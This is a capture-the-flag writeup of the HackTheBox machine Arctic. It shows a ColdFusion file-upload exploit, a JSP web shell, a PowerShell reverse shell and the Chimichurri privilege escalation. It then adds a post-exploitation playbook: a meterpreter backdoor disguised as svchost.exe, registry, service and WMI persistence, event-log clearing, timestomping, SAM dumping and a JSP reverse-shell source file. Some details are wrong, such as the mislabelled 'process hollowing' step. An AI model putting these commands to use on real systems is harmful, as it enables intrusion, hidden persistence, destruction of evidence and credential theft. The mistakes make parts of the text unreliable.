Post

HackTheBox Arctic

Writeup for HackTheBox Arctic

HackTheBox Arctic

Machine Synopsis

Key Exploitation Techniques:

  • ColdFusion 8 directory traversal and file upload vulnerability (CVE-2009-2265)
  • JSP web shell deployment and execution
  • Windows kernel privilege escalation (MS10-059)
  • Handling slow network responses and application timeouts

Reconnaissance & Enumeration

Port Discovery

1
2
3
4
5
$ nmap -p- --min-rate 10000 10.10.10.11
PORT      STATE SERVICE
135/tcp   open  msrpc
8500/tcp  open  fmtp
49154/tcp open  unknown

Service Enumeration

1
2
3
4
5
$ nmap -p 135,8500,49154 -sC -sV 10.10.10.11
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC

Web Application Discovery

Port8500.png

Port8500_2.png

Port8500_3.png

Accessing http://10.10.10.11:8500 shows a directory listing:

1
2
3
Index of /
CFIDE/
cfdocs/

Navigating to /CFIDE/administrator/ reveals Adobe ColdFusion 8 Administrator login page.

Admin.png

ColdFusion Version Identification

1
2
3
4
# Check for version disclosure
$ curl -s http://10.10.10.11:8500/CFIDE/administrator/ | grep -i "version\|coldfusion"
<title>ColdFusion Administrator</title>
<!-- ColdFusion Administrator Login -->

Attempting default credentials fails. The application is very slow to respond.

Exploitation

CVE-2009-2265 Directory Traversal

ColdFusion 8.0.1 contains a directory traversal vulnerability allowing arbitrary file upload.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# Download the exploit
$ wget https://raw.githubusercontent.com/zaphoxx/zaphoxx-coldfusion/refs/heads/main/2265.py

# Create JSP web shell
$ cat > shell.jsp << 'EOF'
<%@ page import="java.util.*,java.io.*"%>
<%
String cmd = request.getParameter("cmd");
if(cmd != null) {
    Process p = Runtime.getRuntime().exec("cmd.exe /c " + cmd);
    InputStream in = p.getInputStream();
    byte[] buf = new byte[8192];
    int len = 0;
    while((len = in.read(buf)) != -1) {
        out.print(new String(buf, 0, len));
    }
    in.close();
}
%>
EOF

File Upload Exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
# Execute the exploit (be patient - very slow responses)
$ python3 exploit.py -t 10.10.10.11 -p 8500 -f shell.jsp
[info] Using following settings:
-----------------------------------
target    :          10.10.10.11
port      :                 8500
filepath  :            shell.jsp
basepath  :
-----------------------------------
[+] File successfully uploaded!
[+] Goto '/userfiles/file/TKVC4S.jsp' to trigger the payload!
[info] Make sure you have a listener active
[info] (e.g. nc -lvp 4444) before triggering the payload

Initial Shell Access

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# Test web shell functionality
$ curl "http://10.10.10.11:8500/userfiles/file/TKVC4S.jsp?cmd=whoami"
arctic\tolis

# Setup reverse shell
$ nc -nlvp 1234

# Execute reverse shell command
$ curl "http://10.10.10.11:8500/userfiles/file/TKVC4S.jsp?cmd=powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%2710.10.14.4%27%2C1234%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22"
PS C:\ColdFusion8\runtime\bin> whoami
arctic\tolis

PS C:\ColdFusion8\runtime\bin> cd C:\Users\tolis\Desktop
PS C:\Users\tolis\Desktop> type user.txt
02650d3a69a70780c302e146a6cb96f3

Privilege Escalation

System Information Gathering

1
2
3
4
5
6
PS C:\ColdFusion8\runtime\bin> systeminfo
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A

Vulnerability Assessment

1
2
3
4
5
# Use Windows Exploit Suggester
$ python windows-exploit-suggester.py --database 2021-05-23-mssb.xls --systeminfo sysinfo.txt

[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[*]   https://www.exploit-db.com/exploits/14610/ -- Chimichurri: Windows Vista/7/2008/2008 R2 Local Privilege Escalation

MS10-059 (Chimichurri) Exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# Download Chimichurri exploit
$ wget https://github.com/egre55/windows-kernel-exploits/raw/master/MS10-059:%20Chimichurri/Compiled/Chimichurri.exe

# Setup SMB server for file transfer
$ impacket-smbserver share . -smb2support
# Transfer exploit to target
PS C:\ColdFusion8\runtime\bin> net use \\10.10.14.4\share
The command completed successfully.

PS C:\ColdFusion8\runtime\bin> copy \\10.10.14.4\share\Chimichurri.exe .
        1 file(s) copied.

# Setup listener for elevated shell
# (on attacking machine)
$ nc -nlvp 443

# Execute privilege escalation
PS C:\ColdFusion8\runtime\bin> .\Chimichurri.exe 10.10.14.4 443

SYSTEM Shell Access

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin> whoami
nt authority\system

C:\ColdFusion8\runtime\bin> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type root.txt
ce65ceee66b2b5ebaff07e50508ffb90

Post-Exploitation Techniques

Persistence Methods

Registry Persistence

1
2
3
4
5
6
7
8
9
10
11
12
13
# Create backdoor payload
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe -o backdoor.exe

# Transfer to target via SMB
$ impacket-smbserver share . -smb2support
# Download and install backdoor
C:\> copy \\10.10.14.4\share\backdoor.exe C:\Windows\System32\svchost.exe

# Add registry auto-start entry
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityCenter" /t REG_SZ /d "C:\Windows\System32\svchost.exe"

# Verify persistence
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityCenter"

Service Installation

# Create persistent service
sc create "ColdFusionSvc" binpath= "C:\Windows\System32\svchost.exe" start= auto
sc start "ColdFusionSvc"
sc query "ColdFusionSvc"

# Setup handler for backdoor connections
# On attacking machine:
$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.4
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit

WMI Event Subscription

# Create WMI event subscription for persistence
wmic /namespace:"\\root\subscription" PATH __EventFilter CREATE Name="SystemUpdate", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfRawData_PerfOS_System'"

wmic /namespace:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="SystemUpdate", CommandLineTemplate="C:\Windows\System32\svchost.exe"

wmic /namespace:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"SystemUpdate\"", Consumer="CommandLineEventConsumer.Name=\"SystemUpdate\""

Defense Evasion

Log Cleanup

# Clear Windows Event Logs
wevtutil cl Application
wevtutil cl Security
wevtutil cl System

# Clear IIS logs (ColdFusion uses IIS)
del "C:\inetpub\logs\LogFiles\W3SVC1\*.log"

# Clear ColdFusion logs
del "C:\ColdFusion8\logs\*.log"
del "C:\ColdFusion8\runtime\logs\*.log"

File Attribute Manipulation

# Hide backdoor files
attrib +h +s C:\Windows\System32\svchost.exe

# Timestomp files to match system files
powershell "(Get-Item C:\Windows\System32\svchost.exe).LastWriteTime = (Get-Item C:\Windows\System32\kernel32.dll).LastWriteTime"
powershell "(Get-Item C:\Windows\System32\svchost.exe).CreationTime = (Get-Item C:\Windows\System32\kernel32.dll).CreationTime"

Process Hollowing

# Kill original svchost process and replace
taskkill /f /im svchost.exe /fi "pid eq 1234"
start C:\Windows\System32\svchost.exe

Lateral Movement Preparation

Network Discovery

# Discover other systems on network
for /L %i in (1,1,254) do @ping -n 1 -w 200 10.10.10.%i > nul && echo 10.10.10.%i is up

# Check for open shares
net view \\10.10.10.20

Credential Harvesting

# Dump SAM database
reg save HKLM\SAM C:\Windows\Temp\sam
reg save HKLM\SYSTEM C:\Windows\Temp\system

# Search for stored passwords in ColdFusion config
type "C:\ColdFusion8\lib\neo-datasource.xml" | findstr password
type "C:\ColdFusion8\lib\neo-security.xml" | findstr password

Domain Enumeration

# Check domain membership
echo %USERDOMAIN%
net user /domain
net group "Domain Admins" /domain

Alternative Exploitation Methods

Manual ColdFusion Exploitation

1
2
3
4
5
6
7
8
# Manual directory traversal for file upload
curl -X POST "http://10.10.10.11:8500/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/" \
  -F "NewFile=@shell.jsp" \
  -H "Content-Type: multipart/form-data"

# Alternative upload path
curl -X POST "http://10.10.10.11:8500/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/cf_upload.cfm" \
  -F "NewFile=@shell.jsp;filename=../../../wwwroot/shell.jsp"

JSP Reverse Shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
  class StreamConnector extends Thread
  {
    InputStream is;
    OutputStream os;
    StreamConnector( InputStream is, OutputStream os )
    {
      this.is = is;
      this.os = os;
    }
    public void run()
    {
      BufferedReader in  = null;
      BufferedWriter out = null;
      try
      {
        in  = new BufferedReader( new InputStreamReader( this.is ) );
        out = new BufferedWriter( new OutputStreamWriter( this.os ) );
        char buffer[] = new char[8192];
        int length;
        while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
        {
          out.write( buffer, 0, length );
          out.flush();
        }
      } catch( Exception e ){}
      try
      {
        if( in != null )
          in.close();
        if( out != null )
          out.close();
      } catch( Exception e ){}
    }
  }
  
  try
  {
    String ShellPath = "cmd.exe";
    Socket socket = new Socket( "10.10.14.4", 1234 );
    Process process = Runtime.getRuntime().exec( ShellPath );
    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
  } catch( Exception e ) {}
%>

This post is licensed under CC BY 4.0 by the author.